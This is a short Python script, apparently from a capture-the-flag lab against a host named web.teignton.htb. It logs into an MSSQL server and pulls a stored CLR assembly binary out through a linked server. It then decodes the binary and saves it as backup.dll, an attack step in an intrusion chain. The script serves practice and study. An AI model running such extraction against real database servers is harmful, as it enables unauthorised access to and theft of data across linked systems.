mssql python / assembly injection
| #!/usr/bin/env python3 | |
| # -*- coding: utf-8 -*- | |
| """Do mssql stuff.""" | |
import os
from base64 import b64decode

import bs4
import pymssql
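HOST = "web.teignton.htb"
PORT = 1433
USER = r"TEIGNTON.HTB\karl.memaybe"
# Never commit a real credential here: the password is taken from the
# MSSQL_PASSWORD environment variable and the literal is only a placeholder
# fallback so the script keeps its previous default when the variable is unset.
PASS = os.environ.get("MSSQL_PASSWORD", "xxxxxx")
DB = "tempdb"
# Local path the decoded binary is written to by main().
DEST_FILE = "backup.dll"
# Select the `content` column of one row of sys.assembly_files through the
# WEB\CLIENTS linked server.  FOR XML AUTO, BINARY BASE64 returns the binary
# column base64-encoded as an XML attribute, which main() parses and decodes.
# (An earlier, immediately overwritten assignment of QUERY was removed.)
QUERY = r"""
select
    content
from [WEB\CLIENTS].clients.sys.assembly_files
where assembly_id = 65536 FOR XML AUTO, BINARY BASE64
"""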
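def main():
    """Run QUERY against HOST and write the decoded ``content`` to DEST_FILE.

    Connects as USER to ``HOST:PORT``/DB, executes QUERY (whose FOR XML
    output carries the binary column as a base64 ``content`` attribute),
    joins the row fragments into one document, extracts the first
    ``content`` attribute, base64-decodes it and writes the bytes to
    DEST_FILE.  The bytes come from the remote server and are written
    verbatim; nothing here validates them.

    Raises:
        RuntimeError: if no element in the result carries a ``content``
            attribute (the original raised a bare IndexError here).
    """
    conn = pymssql.connect(f"{HOST}:{PORT}", USER, PASS, DB)
    try:
        cursor = conn.cursor(as_dict=True)
        cursor.execute(QUERY)
        # FOR XML results may arrive split over several rows; collect every
        # cell and concatenate them back into a single XML text.
        chunks = []
        for row in cursor:
            chunks.extend(row.values())
        txt = "".join(chunks)
    finally:
        # The connection was previously left open until interpreter exit.
        conn.close()

    obj = bs4.BeautifulSoup(txt, features="lxml")
    encoded = [
        tag.attrs.get("content")
        for tag in obj.find_all()
        if tag.attrs.get("content")
    ]
    if not encoded:
        raise RuntimeError("query result contains no 'content' attribute to decode")
    # Decode before opening the output so a bad payload does not leave an
    # empty DEST_FILE behind.
    payload = b64decode(encoded[0])
    with open(DEST_FILE, "wb") as fileh:
        print(f"Writing: {DEST_FILE}")
        fileh.write(payload)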
if __name__ == "__main__":
    # Entry point when run as a script; importing the module does nothing.
    main()